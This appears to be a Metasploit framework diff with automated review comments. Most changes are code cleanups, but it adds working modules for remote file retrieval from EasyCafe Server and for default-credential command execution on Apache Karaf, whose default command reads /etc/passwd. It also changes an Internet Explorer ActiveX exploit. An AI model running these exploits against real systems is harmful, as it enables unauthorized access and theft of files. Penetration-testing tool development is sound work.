b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) end diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 937559cb2c..d7f662fce7 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb 
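Review bot: Removing the `'SSLVersion'` entry leaves `'SSL' => true,` as the last pair before `}` in `DefaultOptions` here and in `symantec_web_gateway_login.rb` and `nessus_rest_login.rb` (and `'RPORT' => 443,` in `ssl_version.rb`); Ruby accepts the trailing comma, but it is inconsistent with the other hashes in this commit, so drop it: `'SSL' => true`.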
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]), - OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]), OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]), OptString.new('TARGETURI', [true, 'The base path', '/']) ], self.class) @@ -35,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary end def run - if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false - print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.") + if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES'] + print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.") else super end @@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary # If no response, quit now if res.nil? - print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No response") return end @@ -65,12 +64,12 @@ class MetasploitModule < Msf::Auxiliary server_header = val if key.downcase == 'server' end else - print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No HTTP headers") end # If the body is blank, just stop now as there is no chance of a title if res.body.nil? - print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage body") return end 
@@ -78,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary # there is no chance that we will have a title rx = %r{[\n\t\s]*(?<title>.+?)[\s\n\t]*}im.match(res.body.to_s) unless rx - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") return end @@ -86,13 +85,15 @@ class MetasploitModule < Msf::Auxiliary rx[:title].strip! if rx[:title] != '' rx_title = Rex::Text.html_decode(rx[:title]) - print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true - if datastore['STORE_NOTES'] == true + if datastore['SHOW_TITLES'] + print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") + end + if datastore['STORE_NOTES'] notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] } report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data) end else - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") end end diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index 27181ef83c..1bcadbbde9 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] vprint_good("#{rhost}:#{rport} - Response - File #{file}:") res.body.each_line do |line| # the following is the last line of the useless response 
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Auxiliary
 end
 out = false
 end
- elsif (res and res.code)
+ elsif res && res.code
 vprint_error("#{rhost}:#{rport} - File->#{file} not found")
 end
 end
diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
new file mode 100644
index 0000000000..b16a4cfc06
--- /dev/null
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyCafe Server Remote File Access', + 'Description' => %q{ + This module exploits a file retrieval vulnerability in + EasyCafe Server. The vulnerability can be triggered by + sending a specially crafted packet (opcode 0x43) to the + 831/TCP port. + This module has been successfully tested on EasyCafe Server + version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 + and Windows 7 SP1. + Note that the server will throw a popup messagebox if the + specified file does not exist. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'R-73eN', # Vulnerability Discovery + 'Brendan Coles ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '39102' ] + ] + )) + + register_options( + [ + Opt::RPORT(831), + OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']) + ], self.class) + end + + def get_file + res = sock.get_once + unless res + print_error("Unable to retrieve file due to a timeout.") + return + end + + unless res.length == 261 + print_error("Received a response of an invalid size.") + return + end + + file_size = res.unpack('@256V')[0] + contents = '' + while contents.length < file_size + contents << sock.get_once + end + + print_status("File retrieved successfully (#{contents.length} bytes)!") + contents + end + + def run_host(ip) + file_path = datastore['FILEPATH'] + if file_path.length > 67 + print_error("File path is longer than 67 characters. 
Try using MS-DOS 8.3 short file names.") + return + end + + packet = "\x43" + packet << file_path + packet << "\x00" * (255 - file_path.length) + packet << "\x01\x00\x00\x00\x01" + + vprint_status("Sending request (#{packet.length} bytes)") + connect + sock.put(packet) + + contents = get_file + disconnect + return if contents.nil? + + path = store_loot( + 'easycafe_server', + 'application/octet-stream', + ip, + contents, + File.basename(file_path) + ) + print_status("File saved in: #{path}") + end +end diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 4accba34bd..dd9d13985d 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 63b2249296..d6145d54e0 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 2d233bed14..1469af89cc 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( 
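Review bot: In `get_file`, `contents << sock.get_once` raises `TypeError` when `get_once` returns `nil` (timeout or closed connection), and the loop's only termination condition is `file_size`, a length the remote server supplies in the 261-byte header — a server that advertises a large size but sends less keeps the scanner waiting until that `nil` crash, and one that sends it all consumes whatever it advertised. Check each chunk and cap the expected size, as in the rewritten loop below. `file_path.length > 67` is rejected while the packet pads to 255 bytes; if 67 is a protocol limit, say so in a comment, otherwise the two numbers look inconsistent. `File.basename(file_path)` does not split on backslashes on a POSIX host, so the loot name may be the whole Windows path; `file_path.split(/[\\\/]/).last` would give the intended name.
```ruby
    file_size = res.unpack('@256V')[0]
    # MAX_FILE_SIZE is a placeholder: choose a cap suited to the files this module fetches
    if file_size > MAX_FILE_SIZE
      print_error("Server advertised #{file_size} bytes, above the #{MAX_FILE_SIZE} byte limit.")
      return
    end

    contents = ''
    while contents.length < file_size
      chunk = sock.get_once
      unless chunk
        print_error("Connection closed after #{contents.length} of #{file_size} bytes.")
        return
      end
      contents << chunk
    end
    # … unchanged: success message and return of contents …
```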
diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index 87d086e4c0..a1cc544140 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -37,12 +37,12 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]), - OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false']) + OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false]) ], self.class) register_advanced_options( [ - OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false']) + OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index 8d358d88a2..18edd5f1e8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index 2985ace425..cb1f1081d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -408,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary end subdirs.shift end - print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true + print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] end unless detailed_tbl.rows.empty? if datastore['LogSpider'] == '1' 
diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
new file mode 100644
index 0000000000..0aaf08e0bd
--- /dev/null
+++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Apache Karaf Default Credentials Command Execution",
+ 'Description' => %q{
+ This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.
+ The 'karaf' user has a known default password, which can be used to login to the
+ SSH service, and execute operating system commands from remote.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Nicholas Starke '
+ ],
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['Apache Karaf', {}],
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => "Feb 9 2016",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(8101),
+ OptString.new('USERNAME', [true, 'Username', 'karaf']),
+ OptString.new('PASSWORD', [true, 'Password', 'karaf']),
+ OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd'])
+ ], self.class
+ )
+
+ register_advanced_options(
+ [
+ Opt::Proxies,
+ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+ OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+ ]
+ )
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def cmd
+ datastore['CMD']
+ end
+
+ def do_login(user, pass, ip)
+ opts = {
+ :auth_methods => ['password'],
+ :msframework => framework,
+ :msfmodule => self,
+ :port => rport,
+ :disable_agent => true,
+ :config => false,
+ :password => pass,
+ :record_auth_info => true,
+ :proxies => datastore['Proxies']
+ }
+
+ opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+ begin
+ ssh = nil
+
::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 4fa73d6970..4decb2fe61 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] ], - 'DisclosureDate' => 'Jan 09 2016', + 'DisclosureDate' => 'Jan 9 2016', 'License' => MSF_LICENSE )) 
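Review bot: In do_login the `rescue Net::SSH::AuthenticationFailed` branch is the only rescue arm without a `return`, so a host that rejects the credentials prints "Failed authentication" and then falls through to the `if ssh` check and prints "Unknown error" as well; add `return` after that print_error as the sibling branches do. The `if output` test in run_host can never be false because `exec!(...).to_s` turns a nil result into `""`, which is truthy, so the "Command failed to execute" branch is unreachable; `unless output.empty?` restores it. run_host also never closes the session do_login hands back, so every successful host leaves an SSH connection open for the remainder of the scan; wrapping the exec! in `begin … ensure ssh.close end` releases it.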
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) ssh_opts = { - port: datastore['RPORT'], + port: rport, auth_methods: ['fortinet-backdoor'] } diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index af26c5f107..21b13ad5ce 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(69), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), - OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false']) + OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false]) ], self.class) end diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index afab67fbee..e214b9f108 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -52,7 +52,7 @@ class MetasploitModule < Msf::Encoder register_options( [ OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]), - OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ]) + OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false]) ], self.class) end @@ -179,10 +179,8 @@ class MetasploitModule < Msf::Encoder raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set." end - protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true" - # with everything set up, we can now call the encoding routine - state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload) + state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect']) state.buf = "" state.decoder_stub 
diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index 9589326a0e..e2080dcb13 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 67af68d37f..fcac6a43c6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index cf5ac18410..c8d35b9342 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("Added printer successfully") delete_printer(printer_name) - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_error("Authentication failed") elsif res.code == 426 vprint_error("SSL required - set SSL true") 
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("Added printer successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") @@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("Added test page to printer queue") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") @@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("Deleted printer '#{printer_name}' successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") 
diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index 99db3c5a68..624e5aa36b 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false + if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 3d4ef14bc7..a540ab99c6 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor - placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. + placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index 44fee16c47..4143c99639 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote ], self.class) register_advanced_options( [ - OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']), + OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]), ], self.class) register_autofilter_ports([ 50013 ]) end 
diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 58f15eda96..d799eff564 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote # msf/core/exploit/http/server.rb # def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP + # Ensure all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] @@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index a4c51d6f03..70a7a5713e 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index dc6584ece0..fedf43dcfc 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb 
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 80294d38ef..1e47de44e0 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n"; end def exploit - if datastore['DESTRUCTIVE'] == true + if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 43c49d7789..3db44238f6 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb 
@@ -8,16 +8,26 @@ require 'msf/util/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpServer::HTML + Rank = ManualRanking + + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Powershell + VULN_CHECK_JS = %Q| + try { + new ActiveXObject("WScript.Shell"); + new ActiveXObject("Scripting.FileSystemObject"); + is_vuln = true; + } catch(e) {} + | + + def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', - 'Description' => %q{ + 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', + 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to 
@@ -36,43 +46,77 @@ class MetasploitModule < Msf::Exploit::Remote IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from an x64 iexplore.exe. + + By default, this module will not attempt to fire against IEs that come with Protected + Mode enabled by default, because it can trigger a security prompt. However, if you are + feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT + datastore option to true. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'natron', 'Ben Campbell' # PSH and remove ADODB.Stream ], - 'References' => + 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://support.microsoft.com/kb/870669'] ], - 'DisclosureDate' => 'Sep 20 2010', - 'Platform' => 'win', - 'Targets' => + 'DisclosureDate' => 'Sep 20 2010', + 'Platform' => 'win', + 'BrowserRequirements' => { + source: 'script', + os_name: OperatingSystems::Match::WINDOWS, + ua_name: HttpClients::IE, + vuln_test: VULN_CHECK_JS, + vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.' 
+ }, + 'Arch' => ARCH_X86, + 'Targets' => [ - [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ] + [ 'Windows x86/x64', {} ] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]), + OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]), + OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]) ], self.class ) end - def on_request_uri(cli, request) + # Unfortunately we don't currently have an explicit way to check whether Protected Mode is + # actually enabled or not, so we can only rely on whatever is default on the OS. This should + # allow BAP2 to always fire without worrying about the prmopt popping up, but the user can + # still ignore this by setting ALLOWPROMPT to true in standalone mode. + def has_protected_mode_prompt?(browser) + if datastore['ALLOWPROMPT'] + return false + elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name] + return false + end + + true + end + + def on_request_exploit(cli, request, browser) + if has_protected_mode_prompt?(browser) + print_warning("This target possibly has Protected Mode, exploit aborted.") + send_not_found(cli) + return + end # Build out the HTML response page - var_shellobj = rand_text_alpha(rand(5)+5) + var_shellobj = rand_text_alpha(rand(5)+5) p = regenerate_payload(cli) if datastore['TECHNIQUE'] == 'VBS' 
